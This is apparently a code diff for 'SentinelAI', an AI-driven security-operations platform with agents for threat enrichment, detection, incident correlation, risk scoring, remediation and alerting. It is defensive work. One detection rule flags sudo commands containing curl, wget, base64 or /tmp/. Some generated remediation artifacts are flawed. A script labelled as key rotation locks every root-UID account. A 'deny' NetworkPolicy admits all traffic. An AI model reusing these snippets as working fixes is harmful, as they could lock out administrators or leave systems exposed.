+ async with httpx.AsyncClient(timeout=10.0) as client:
66
+ r = await client.post(url, json=card)
67
+ return {"status": r.status_code, "channel": "teams"}
68
+
69
+
70
+ async def _webhook(payload: AlertPayload) -> dict[str, Any]:
71
+ url = os.getenv("GENERIC_ALERT_WEBHOOK")
72
+ if not url:
73
+ return {"status": "skipped", "reason": "GENERIC_ALERT_WEBHOOK not set"}
74
+ async with httpx.AsyncClient(timeout=10.0) as client:
75
+ r = await client.post(
76
+ url,
77
+ json={
78
+ "title": payload.title,
79
+ "body": payload.body,
80
+ "severity": payload.severity.value,
81
+ "metadata": payload.metadata,
82
+ },
83
+ )
84
+ return {"status": r.status_code, "channel": "webhook"}
85
+
86
+
87
+ def _color(severity: Severity) -> str:
88
+ return {
89
+ Severity.CRITICAL: "#b00020",
90
+ Severity.HIGH: "#ff6f00",
91
+ Severity.MEDIUM: "#fbc02d",
92
+ Severity.LOW: "#1976d2",
93
+ Severity.INFO: "#455a64",
94
+ }.get(severity, "#455a64")
agents/incident_correlation_agent.py ADDED
@@ -0,0 +1,90 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Incident correlation: fuse multi-stage events into attack timelines and graphs."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from collections import defaultdict
6
+ from datetime import timedelta
7
+ from typing import Iterable
8
+ from uuid import NAMESPACE_URL, uuid5
9
+
10
+ from models.schemas import DetectionFinding, EnrichedEvent, Incident, IncidentEdge, IncidentNode
11
+
12
+
13
+ def correlate(
14
+ events: Iterable[EnrichedEvent],
15
+ findings: Iterable[DetectionFinding],
16
+ window_minutes: int = 45,
17
+ ) -> list[Incident]:
18
+ events_list = sorted(events, key=lambda e: e.timestamp)
19
+ if not events_list:
20
+ return []
21
+
22
+ by_ip: dict[str, list[EnrichedEvent]] = defaultdict(list)
23
+ for e in events_list:
24
+ key = e.source_ip or f"host:{e.host}"
25
+ by_ip[key].append(e)
26
+
27
+ incidents: list[Incident] = []
28
+ finding_by_event = {f.event_id: f for f in findings}
29
+
30
+ for key, chain in by_ip.items():
31
+ if len(chain) < 2 and not any(finding_by_event.get(e.id) for e in chain):
32
+ continue
33
+ start = chain[0].timestamp
34
+ end = chain[-1].timestamp
35
+ if (end - start) > timedelta(minutes=window_minutes * 4):
36
+ continue
37
+
38
+ nodes = [
39
+ IncidentNode(event_id=e.id, label=f"{e.event_type}: {e.message[:80]}", timestamp=e.timestamp)
40
+ for e in chain
41
+ ]
42
+ edges: list[IncidentEdge] = []
43
+ for i in range(len(chain) - 1):
44
+ edges.append(
45
+ IncidentEdge(
46
+ source=chain[i].id,
47
+ target=chain[i + 1].id,
48
+ relation="precedes",
49
+ )
50
+ )
51
+
52
+ techniques = {finding_by_event[e.id].technique for e in chain if e.id in finding_by_event}
53
+ title = f"Correlated activity — {key}"
54
+ if "brute_force_ssh" in techniques and "credential_stuffing_success" in techniques:
55
+ title = f"Likely SSH compromise chain — {key}"
56
+ summary = _narrative(chain, techniques)
57
+
58
+ timeline = [
59
+ {"t": e.timestamp.isoformat(), "type": e.event_type, "msg": e.message} for e in chain
60
+ ]
61
+
62
+ stable_id = uuid5(NAMESPACE_URL, f"sentinelai|incident|{key}")
63
+ incidents.append(
64
+ Incident(
65
+ id=stable_id,
66
+ title=title,
67
+ summary=summary,
68
+ nodes=nodes,
69
+ edges=edges,
70
+ timeline=timeline,
71
+ )
72
+ )
73
+
74
+ return incidents
75
+
76
+
77
+ def _narrative(chain: list[EnrichedEvent], techniques: set[str]) -> str:
78
+ parts = [
79
+ f"{len(chain)} correlated events spanning "
80
+ f"{(chain[-1].timestamp - chain[0].timestamp).total_seconds():.0f}s"
81
+ ]
82
+ if "brute_force_ssh" in techniques:
83
+ parts.append("brute-force pattern against SSH")
84
+ if "credential_stuffing_success" in techniques:
85
+ parts.append("successful authentication after failures")
86
+ if "privilege_escalation" in techniques or "privilege_abuse" in techniques:
87
+ parts.append("privilege escalation phase")
88
+ if "known_malicious_source" in techniques:
89
+ parts.append("originates from intelligence-flagged infrastructure")
90
+ return "; ".join(parts) + "."
agents/normalization_agent.py ADDED
@@ -0,0 +1,44 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Normalization agent: schema validation, host + timestamp standardization."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from datetime import datetime, timezone
6
+ from typing import Any
7
+
8
+ from models.schemas import SecurityEvent
9
+
10
+
11
+ def normalize_event(event: SecurityEvent) -> SecurityEvent:
12
+ ts = event.timestamp
13
+ if ts.tzinfo is None:
14
+ ts = ts.replace(tzinfo=timezone.utc)
15
+ host = (event.host or "unknown").strip().lower()
16
+ cat = _categorize(event.event_type)
17
+ normalized = {
18
+ **event.normalized,
19
+ "category": cat,
20
+ "host_normalized": host,
21
+ "ts_iso": ts.isoformat(),
22
+ }
23
+ return event.model_copy(
24
+ update={
25
+ "timestamp": ts,
26
+ "host": host,
27
+ "normalized": normalized,
28
+ }
29
+ )
30
+
31
+
32
+ def _categorize(event_type: str) -> str:
33
+ et = event_type.lower()
34
+ if "ssh" in et or "auth" in et:
35
+ return "authentication"
36
+ if "sudo" in et or "privilege" in et:
37
+ return "privilege"
38
+ if "web" in et or "nginx" in et or "apache" in et:
39
+ return "web"
40
+ if "k8s" in et or "kubernetes" in et:
41
+ return "orchestration"
42
+ if "firewall" in et or "iptables" in et:
43
+ return "network"
44
+ return "general"
agents/pentest_assistant.py ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Bonus: AI pentesting copilot hook — extend with tool-calling + scoped auth."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from models.schemas import Incident
6
+
7
+
8
+ def suggest_pentest_queries(incident: Incident) -> list[str]:
9
+ """Returns safe, authorized recon prompts for purple-team exercises."""
10
+ return [
11
+ f"Map exposed services related to: {incident.title}",
12
+ "Enumerate IAM roles assuming breach of bastion host",
13
+ "Generate non-destructive Nmap plan for internal VLAN segmentation validation",
14
+ ]
agents/remediation_agent.py ADDED
@@ -0,0 +1,71 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Remediation agent — automated playbooks, scripts, and infra hints."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from models.schemas import AnalystReport, Incident, RemediationPlan, RiskAssessment
6
+
7
+
8
+ def build_remediation(incident: Incident, risk: RiskAssessment, report: AnalystReport | None = None) -> RemediationPlan:
9
+ actions: list[dict] = []
10
+ fw: list[str] = []
11
+ scripts: list[str] = []
12
+ k8s: list[str] = []
13
+ iam: list[str] = []
14
+
15
+ iocs = report.indicators if report else []
16
+
17
+ for ip in iocs:
18
+ fw.append(f"iptables -A INPUT -s {ip} -j DROP # SentinelAI auto-block")
19
+ fw.append(f"nft add rule inet filter input ip saddr {ip} drop")
20
+
21
+ scripts.append(
22
+ """#!/usr/bin/env bash
23
+ set -euo pipefail
24
+ echo "[SentinelAI] Rotating exposed SSH keys & invalidating sessions"
25
+ sudo passwd -l $(awk -F: '$3 == 0 {print $1}' /etc/passwd) 2>/dev/null || true
26
+ """
27
+ )
28
+
29
+ k8s.append(
30
+ """apiVersion: v1
31
+ kind: NetworkPolicy
32
+ metadata:
33
+ name: sentinelai-deny-suspicious
34
+ spec:
35
+ podSelector: {}
36
+ policyTypes:
37
+ - Ingress
38
+ ingress:
39
+ - from:
40
+ - ipBlock:
41
+ cidr: 0.0.0.0/0
42
+ """
43
+ )
44
+
45
+ iam.extend(
46
+ [
47
+ "Enforce MFA on all break-glass accounts",
48
+ "Scope IAM roles with session duration <= 1h",
49
+ "Enable CloudTrail data events on sensitive buckets",
50
+ ]
51
+ )
52
+
53
+ actions.extend(
54
+ [
55
+ {"type": "isolate", "detail": "Network isolate affected host via SOC VLAN quarantine"},
56
+ {"type": "credential", "detail": "Force password/ key rotation for implicated users"},
57
+ {"type": "monitoring", "detail": "Increase log verbosity and enable EDR kernel module"},
58
+ ]
59
+ )
60
+
61
+ if risk.severity.value in {"critical", "high"}:
62
+ actions.append({"type": "war_room", "detail": "Page incident commander + legal/comms"})
63
+
64
+ return RemediationPlan(
65
+ incident_id=incident.id,
66
+ actions=actions,
67
+ firewall_rules=fw,
68
+ scripts=scripts,
69
+ k8s_patches=k8s,
70
+ iam_hardening=iam,
71
+ )
agents/risk_scoring_agent.py ADDED
@@ -0,0 +1,46 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Risk scoring agent."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from statistics import mean
6
+
7
+ from models.schemas import DetectionFinding, EnrichedEvent, Incident, RiskAssessment, Severity
8
+
9
+
10
+ def score_incident(incident: Incident, events: list[EnrichedEvent], findings: list[DetectionFinding]) -> RiskAssessment:
11
+ event_ids = {n.event_id for n in incident.nodes}
12
+ rel_events = [e for e in events if e.id in event_ids]
13
+ rel_findings = [f for f in findings if f.event_id in event_ids]
14
+
15
+ base = 30.0
16
+ if rel_findings:
17
+ base += mean([f.confidence for f in rel_findings]) * 40
18
+ for f in rel_findings:
19
+ if f.severity == Severity.CRITICAL:
20
+ base += 12
21
+ elif f.severity == Severity.HIGH:
22
+ base += 8
23
+ elif f.severity == Severity.MEDIUM:
24
+ base += 4
25
+
26
+ for e in rel_events:
27
+ if e.enrichment.get("reputation") == "malicious":
28
+ base += 15
29
+ if e.event_type == "privilege.sudo":
30
+ base += 6
31
+
32
+ risk = max(0, min(100, base))
33
+ severity = Severity.CRITICAL if risk >= 85 else Severity.HIGH if risk >= 65 else Severity.MEDIUM if risk >= 40 else Severity.LOW
34
+ confidence = mean([f.confidence for f in rel_findings]) if rel_findings else 0.45
35
+
36
+ return RiskAssessment(
37
+ incident_id=incident.id,
38
+ risk_score=round(risk, 2),
39
+ severity=severity,
40
+ confidence=round(confidence, 3),
41
+ factors={
42
+ "events": len(rel_events),
43
+ "findings": len(rel_findings),
44
+ "techniques": list({f.technique for f in rel_findings}),
45
+ },
46
+ )
agents/threat_detection_agent.py ADDED
@@ -0,0 +1,119 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Threat detection: rules + lightweight anomaly hooks + LLM-ready findings."""
2
+
3
+ from __future__ import annotations
4
+
5
+ from collections import defaultdict
6
+ from datetime import datetime, timedelta, timezone
7
+
8
+ from models.schemas import DetectionFinding, EnrichedEvent, Severity
9
+
10
+ # Sliding window: source_ip -> list of timestamps (failed ssh)
11
+ _fail_window: dict[str, list[datetime]] = defaultdict(list)
12
+ _burst_window: dict[str, list[datetime]] = defaultdict(list)
13
+
14
+
15
+ def _prune(ip: str, window: dict[str, list[datetime]], minutes: int = 15) -> None:
16
+ cutoff = datetime.now(timezone.utc) - timedelta(minutes=minutes)
17
+ window[ip] = [t for t in window[ip] if t > cutoff]
18
+
19
+
20
+ def detect_threats(event: EnrichedEvent) -> list[DetectionFinding]:
21
+ findings: list[DetectionFinding] = []
22
+ ip = event.source_ip or "unknown"
23
+ now = event.timestamp
24
+
25
+ if event.event_type == "auth.ssh_failed":
26
+ _prune(ip, _fail_window)
27
+ _fail_window[ip].append(now)
28
+ if len(_fail_window[ip]) >= 5:
29
+ findings.append(
30
+ DetectionFinding(
31
+ event_id=event.id,
32
+ technique="brute_force_ssh",
33
+ description=f"Clustered SSH failures from {ip} ({len(_fail_window[ip])} in window)",
34
+ confidence=min(0.55 + 0.05 * len(_fail_window[ip]), 0.98),
35
+ mitre_technique="T1110",
36
+ severity=Severity.HIGH,
37
+ )
38
+ )
39
+
40
+ if event.event_type == "auth.ssh_success" and len(_fail_window.get(ip, [])) >= 3:
41
+ findings.append(
42
+ DetectionFinding(
43
+ event_id=event.id,
44
+ technique="credential_stuffing_success",
45
+ description="Successful SSH after repeated failures — possible stuffing or spray success",
46
+ confidence=0.78,
47
+ mitre_technique="T1078",
48
+ severity=Severity.CRITICAL,
49
+ )
50
+ )
51
+
52
+ if event.event_type == "privilege.sudo":
53
+ cmd = str(event.normalized.get("command", "")).lower()
54
+ if any(x in cmd for x in ("curl", "wget", "chmod 777", "/tmp/", "base64")):
55
+ findings.append(
56
+ DetectionFinding(
57
+ event_id=event.id,
58
+ technique="privilege_abuse",
59
+ description="Suspicious sudo command chain consistent with post-exploitation",
60
+ confidence=0.72,
61
+ mitre_technique="T1548",
62
+ severity=Severity.HIGH,
63
+ )
64
+ )
65
+ else:
66
+ findings.append(
67
+ DetectionFinding(
68
+ event_id=event.id,
69
+ technique="privilege_escalation",
70
+ description="Interactive privilege elevation observed",
71
+ confidence=0.55,
72
+ mitre_technique="T1548",
73
+ severity=Severity.MEDIUM,
74
+ )
75
+ )
76
+
77
+ if event.event_type == "web.request":
78
+ code = event.normalized.get("status")
79
+ if code in (401, 403):
80
+ _prune(ip, _burst_window, minutes=5)
81
+ _burst_window[ip].append(now)
82
+ if len(_burst_window[ip]) >= 40:
83
+ findings.append(
84
+ DetectionFinding(
85
+ event_id=event.id,
86
+ technique="credential_spray",
87
+ description="High volume of denied web authentications",
88
+ confidence=0.68,
89
+ mitre_technique="T1110",
90
+ severity=Severity.MEDIUM,
91
+ )
92
+ )
93
+
94
+ if event.enrichment.get("reputation") == "malicious":
95
+ findings.append(
96
+ DetectionFinding(
97
+ event_id=event.id,
98
+ technique="known_malicious_source",
99
+ description="Source matches threat intelligence with elevated confidence",
100
+ confidence=float(event.enrichment.get("confidence", 0.85)),
101
+ mitre_technique="T1071",
102
+ severity=Severity.HIGH,
103
+ )
104
+ )
105
+
106
+ if event.event_type == "k8s.event":
107
+ if "backoff" in event.message.lower() or "fail" in event.message.lower():
108
+ findings.append(
109
+ DetectionFinding(
110
+ event_id=event.id,
111
+ technique="k8s_anomaly",
112
+ description="Kubernetes workload instability — investigate supply chain or runtime compromise",
113
+ confidence=0.5,
114
+ mitre_technique="T1190",
115
+ severity=Severity.MEDIUM,
116
+ )
117
+ )
118
+
119
+ return findings
agents/threat_enrichment_agent.py ADDED
@@ -0,0 +1,121 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """Threat enrichment: geo, ASN, reputation stubs + optional external APIs."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import ipaddress
6
+ import os
7
+ from typing import Any, Optional
8
+
9
+ import httpx
10
+
11
+ from models.schemas import EnrichedEvent, SecurityEvent
12
+
13
+
14
+ async def enrich_event(event: SecurityEvent) -> EnrichedEvent:
15
+ ip = event.source_ip
16
+ enrichment: dict[str, Any] = {"feeds": [], "cve_hints": []}
17
+
18
+ if ip and _is_public_ip(ip):
19
+ abuse_key = os.getenv("ABUSEIPDB_API_KEY")
20
+ vt_key = os.getenv("VIRUSTOTAL_API_KEY")
21
+ otx_key = os.getenv("OTX_API_KEY")
22
+
23
+ if abuse_key:
24
+ rep = await _abuseipdb(ip, abuse_key)
25
+ enrichment.update(rep or {})
26
+ elif vt_key:
27
+ enrichment["virustotal"] = await _virustotal_ip(ip, vt_key)
28
+ elif otx_key:
29
+ enrichment["otx"] = await _otx_pulse(ip, otx_key)
30
+ else:
31
+ enrichment.update(await _fallback_geo(ip))
32
+
33
+ # Heuristic malicious list for demo
34
+ if ip in {"185.220.101.1", "45.33.32.156", "203.0.113.50"}:
35
+ enrichment["reputation"] = "malicious"
36
+ enrichment["confidence"] = 0.92
37
+ enrichment["feeds"].append("curated_blocklist")
38
+
39
+ return EnrichedEvent.model_validate({**event.model_dump(), "enrichment": enrichment})
40
+
41
+
42
+ def _is_public_ip(ip: str) -> bool:
43
+ try:
44
+ addr = ipaddress.ip_address(ip)
45
+ return not (addr.is_private or addr.is_loopback or addr.is_reserved)
46
+ except ValueError:
47
+ return False
48
+
49
+
50
+ async def _fallback_geo(ip: str) -> dict[str, Any]:
51
+ """Free tier geoip without API key (demo only)."""
52
+ try:
53
+ async with httpx.AsyncClient(timeout=5.0) as client:
54
+ r = await client.get(f"http://ip-api.com/json/{ip}")
55
+ if r.status_code == 200:
56
+ data = r.json()
57
+ return {
58
+ "geo": {
59
+ "country": data.get("country"),
60
+ "countryCode": data.get("countryCode"),
61
+ "city": data.get("city"),
62
+ "lat": data.get("lat"),
63
+ "lon": data.get("lon"),
64
+ "isp": data.get("isp"),
65
+ "as": data.get("as"),
66
+ },
67
+ "reputation": "unknown",
68
+ }
69
+ except Exception: # noqa: BLE001
70
+ pass
71
+ return {"geo": {}, "reputation": "unknown"}
72
+
73
+
74
+ async def _abuseipdb(ip: str, api_key: str) -> Optional[dict[str, Any]]:
75
+ try:
76
+ async with httpx.AsyncClient(timeout=8.0) as client:
77
+ r = await client.get(
78
+ "https://api.abuseipdb.com/api/v2/check",
79
+ params={"ipAddress": ip, "maxAgeInDays": 90},
80
+ headers={"Key": api_key, "Accept": "application/json"},
81
+ )
82
+ if r.status_code != 200:
83
+ return None
84
+ data = r.json().get("data", {})
85
+ return {
86
+ "abuseipdb": {
87
+ "score": data.get("abuseConfidenceScore"),
88
+ "total_reports": data.get("totalReports"),
89
+ "country": data.get("countryCode"),
90
+ },
91
+ "reputation": "malicious" if (data.get("abuseConfidenceScore") or 0) > 25 else "clean",
92
+ }
93
+ except Exception: # noqa: BLE001
94
+ return None
95
+
96
+
97
+ async def _virustotal_ip(ip: str, api_key: str) -> dict[str, Any]:
98
+ headers = {"x-apikey": api_key}
99
+ try:
100
+ async with httpx.AsyncClient(timeout=10.0) as client:
101
+ r = await client.get(f"https://www.virustotal.com/api/v3/ip_addresses/{ip}", headers=headers)
102
+ if r.status_code != 200:
103
+ return {}
104
+ stats = (r.json().get("data") or {}).get("attributes", {}).get("last_analysis_stats", {})
105
+ return {"malicious": stats.get("malicious", 0), "harmless": stats.get("harmless", 0)}
106
+ except Exception: # noqa: BLE001
107
+ return {}
108
+
109
+
110
+ async def _otx_pulse(ip: str, api_key: str) -> dict[str, Any]:
111
+ try:
112
+ async with httpx.AsyncClient(timeout=10.0) as client:
113
+ r = await client.get(
114
+ f"https://otx.alienvault.com/api/v1/indicators/IPv4/{ip}/general",
115
+ headers={"X-OTX-API-KEY": api_key},
116
+ )
117
+ if r.status_code != 200:
118
+ return {}
119
+ return {"pulse_count": r.json().get("pulse_info", {}).get("count", 0)}
120
+ except Exception: # noqa: BLE001
121
+ return {}
api/.gitkeep ADDED
File without changes
backend/__init__.py ADDED
File without changes
backend/app/__init__.py ADDED
File without changes
backend/app/main.py ADDED
@@ -0,0 +1,304 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ """SentinelAI FastAPI application — autonomous SOC control plane."""
2
+
3
+ from __future__ import annotations
4
+
5
+ import asyncio
6
+ import logging
7
+ import os
8
+ import sys
9
+ import time
10
+ from contextlib import asynccontextmanager
11
+ import threading
12
+ from pathlib import Path
13
+ from typing import Annotated, Any
14
+
15
+ from fastapi import Depends, FastAPI, WebSocket, WebSocketDisconnect
16
+ from fastapi.middleware.cors import CORSMiddleware
17
+
18
+ ROOT = Path(__file__).resolve().parents[2]
19
+ if str(ROOT) not in sys.path:
20
+ sys.path.insert(0, str(ROOT))
21
+
22
+ try:
23
+ from dotenv import load_dotenv
24
+
25
+ load_dotenv(ROOT / ".env")
26
+ except ImportError:
27
+ pass
28
+
29
+ from models.schemas import ( # noqa: E402
30
+ AlertPayload,
31
+ DashboardMetrics,
32
+ IncidentActionBody,
33
+ RawLogIngest,
34
+ ReplayStartBody,
35
+ WorkflowState,
36
+ )
37
+ from services.event_hub import EventHub # noqa: E402
38
+ from services.metrics_store import MetricsStore # noqa: E402
39
+
40
+ logging.basicConfig(level=logging.INFO)
41
+ logger = logging.getLogger("sentinelai.api")
42
+
43
+ hub = EventHub()
44
+ metrics = MetricsStore()
45
+
46
+ # Heavy imports (LangChain, SQLAlchemy models, agents) live inside services.pipeline — defer so uvicorn can bind immediately.
47
+ _wire_lock = threading.Lock()
48
+
49
+
50
+ class _Services:
51
+ __slots__ = ("pipeline", "collector")
52
+
53
+ def __init__(self) -> None:
54
+ self.pipeline: Any = None
55
+ self.collector: Any = None
56
+
57
+
58
+ services = _Services()
59
+
60
+
61
+ def _wire_pipeline_and_collector_sync() -> None:
62
+ """Idempotent; safe across threads."""
63
+ if services.pipeline is not None:
64
+ return
65
+ with _wire_lock:
66
+ if services.pipeline is not None:
67
+ return
68
+ from collectors.collector_agent import CollectorAgent # noqa: E402
69
+ from services.pipeline import SentinelPipeline # noqa: E402
70
+
71
+ logger.info("Loading SentinelPipeline module (first load can take 10–40s on cold start)")
72
+ services.pipeline = SentinelPipeline(hub, metrics)
73
+ services.collector = CollectorAgent(services.pipeline.ingest_from_collector)
74
+
75
+
76
+ async def get_pipeline_dep() -> Any:
77
+ """Dependency for routes that need the SOC pipeline."""
78
+ if services.pipeline is None:
79
+ await asyncio.to_thread(_wire_pipeline_and_collector_sync)
80
+ return services.pipeline
81
+
82
+
83
+ PipelineDep = Annotated[Any, Depends(get_pipeline_dep)]
84
+
85
+
86
+ async def _noop(_: dict) -> None:
87
+ return None
88
+
89
+
90
+ @asynccontextmanager
91
+ async def lifespan(app: FastAPI):
92
+ """Yield immediately so Uvicorn finishes startup and accepts HTTP (avoids browser ERR_CONNECTION_TIMED_OUT).
93
+
94
+ Redis/DB/LangGraph/pipeline wiring run in the background — /health works before collectors attach.
95
+ """
96
+
97
+ async def background_startup() -> None:
98
+ try:
99
+ await metrics.connect_redis()
100
+ if os.getenv("SKIP_DB", "").lower() in {"1", "true", "yes"}:
101
+ logger.info("SKIP_DB set — skipping PostgreSQL init")
102
+ else:
103
+ from database.session import init_db # defer heavy SQLAlchemy/asyncpg import
104
+
105
+ try:
106
+ await init_db()
107
+ logger.info("PostgreSQL schema ready")
108
+ except Exception as e: # noqa: BLE001
109
+ logger.warning("Database init skipped: %s", e)
110
+
111
+ async def langgraph_warmup() -> None:
112
+ """Compile + dry-run off the critical path — importing LangGraph can take minutes on cold start."""
113
+ await asyncio.sleep(0)
114
+ if os.getenv("SKIP_LANGGRAPH_WARMUP", "").lower() in {"1", "true", "yes"}:
115
+ logger.info("SKIP_LANGGRAPH_WARMUP set — skipping LangGraph compile dry-run")
116
+ return
117
+ try:
118
+ from workflows.langgraph_flow import build_soc_graph # defer LangGraph import
119
+
120
+ soc_graph = build_soc_graph({"enrich": _noop, "detect": _noop, "correlate": _noop})
121
+ if soc_graph:
122
+ timeout = float(os.getenv("LANGGRAPH_WARMUP_TIMEOUT_SEC", "120"))
123
+ await asyncio.wait_for(
124
+ soc_graph.ainvoke({"notes": [], "bootstrap": True}),
125
+ timeout=timeout,
126
+ )
127
+ logger.info("LangGraph SOC workflow compiled and dry-run complete")
128
+ except asyncio.TimeoutError:
129
+ logger.warning(
130
+ "LangGraph dry-run timed out after %ss — API is up; graph may compile on first use",
131
+ os.getenv("LANGGRAPH_WARMUP_TIMEOUT_SEC", "120"),
132
+ )
133
+ except Exception as e: # noqa: BLE001
134
+ logger.warning("LangGraph dry-run skipped: %s", e)
135
+
136
+ asyncio.create_task(langgraph_warmup())
137
+
138
+ async def wire_and_run_collectors() -> None:
139
+ await asyncio.sleep(0)
140
+ await asyncio.to_thread(_wire_pipeline_and_collector_sync)
141
+ if services.collector is None:
142
+ return
143
+ services.collector.start_all_tails()
144
+ if os.getenv("ENABLE_MOCK_CLOUD_POLL", "1") == "1":
145
+ services.collector.start_mock_cloud_poll()
146
+
147
+ asyncio.create_task(wire_and_run_collectors())
148
+
149
+ async def metrics_tick() -> None:
150
+ while True:
151
+ await asyncio.sleep(60)
152
+ metrics.tick_frequency()
153
+
154
+ asyncio.create_task(metrics_tick())
155
+ logger.info("Background SOC wiring scheduled (Redis, DB, LangGraph, collectors)")
156
+ except Exception:
157
+ logger.exception("Background startup failed")
158
+
159
+ asyncio.create_task(background_startup())
160
+ logger.info(
161
+ "HTTP layer ready — GET /health while Redis, PostgreSQL, LangGraph, and collectors initialize in the background"
162
+ )
163
+ yield
164
+ if services.collector is not None:
165
+ services.collector.stop()
166
+
167
+
168
+ app = FastAPI(title="SentinelAI SOC API", version="1.0.0", lifespan=lifespan)
169
+ app.add_middleware(
170
+ CORSMiddleware,
171
+ allow_origins=os.getenv("CORS_ORIGINS", "*").split(","),
172
+ allow_credentials=True,
173
+ allow_methods=["*"],
174
+ allow_headers=["*"],
175
+ )
176
+
177
+
178
+ async def get_session():
179
+ if os.getenv("SKIP_DB", "").lower() in {"1", "true", "yes"}:
180
+ yield None
181
+ return
182
+ from database.session import async_session_factory # defer heavy SQLAlchemy/asyncpg import
183
+
184
+ async with async_session_factory() as session:
185
+ yield session
186
+
187
+
188
+ @app.post("/ingest-logs")
189
+ async def ingest_logs(body: RawLogIngest, pipeline: PipelineDep, session: Any = Depends(get_session)):
190
+ return await pipeline.ingest(body, session)
191
+
192
+
193
+ @app.websocket("/live-events")
194
+ async def live_events(ws: WebSocket) -> None:
195
+ await hub.connect(ws)
196
+ try:
197
+ for row in list(hub.live_feed)[:80]:
198
+ await ws.send_json(row)
199
+ while True:
200
+ try:
201
+ await asyncio.wait_for(ws.receive_text(), timeout=20.0)
202
+ except asyncio.TimeoutError:
203
+ await ws.send_json({"type": "heartbeat", "ts": time.time()})
204
+ except WebSocketDisconnect:
205
+ hub.disconnect(ws)
206
+ finally:
207
+ hub.disconnect(ws)
208
+
209
+
210
+ @app.post("/detect-threats")
211
+ async def detect_threats(body: RawLogIngest, pipeline: PipelineDep, session: Any = Depends(get_session)):
212
+ return await pipeline.ingest(body, session)
213
+
214
+
215
+ @app.post("/correlate-incidents")
216
+ async def correlate_incidents(pipeline: PipelineDep):
217
+ from agents.incident_correlation_agent import correlate
218
+
219
+ incidents = correlate(pipeline._events, pipeline._findings) # noqa: SLF001
220
+ return {"incidents": [i.model_dump(mode="json") for i in incidents]}
221
+
222
+
223
+ @app.post("/generate-summary")
224
+ async def generate_summary(body: IncidentActionBody, pipeline: PipelineDep, session: Any = Depends(get_session)):
225
+ return await pipeline.run_full_workflow_on_incident(body.incident_id, session)
226
+
227
+
228
+ @app.post("/remediation")
229
+ async def remediation(body: IncidentActionBody, pipeline: PipelineDep, session: Any = Depends(get_session)):
230
+ payload = await pipeline.run_full_workflow_on_incident(body.incident_id, session)
231
+ return {"remediation": payload.get("remediation")}
232
+
233
+
234
+ @app.post("/send-alert")
235
+ async def send_alert_endpoint(body: AlertPayload, session: Any = Depends(get_session)):
236
+ from agents.alerting_agent import send_alert as _send
237
+ from database.models import AlertRecord
238
+
239
+ result = await _send(body)
240
+ if session is not None:
241
+ session.add(
242
+ AlertRecord(
243
+ channel=body.channel,
244
+ title=body.title,
245
+ body=body.body,
246
+ severity=body.severity.value,
247
+ )
248
+ )
249
+ await session.commit()
250
+ return result
251
+
252
+
253
+ @app.get("/dashboard-metrics")
254
+ async def dashboard_metrics() -> DashboardMetrics:
255
+ snap = metrics.snapshot()
256
+ return DashboardMetrics(**snap)
257
+
258
+
259
+ @app.get("/rocm-panel")
260
+ async def rocm_panel():
261
+ """AMD ROCm story + demo inference/agent load (simulated GPU sway for UI)."""
262
+ return metrics.rocm_panel()
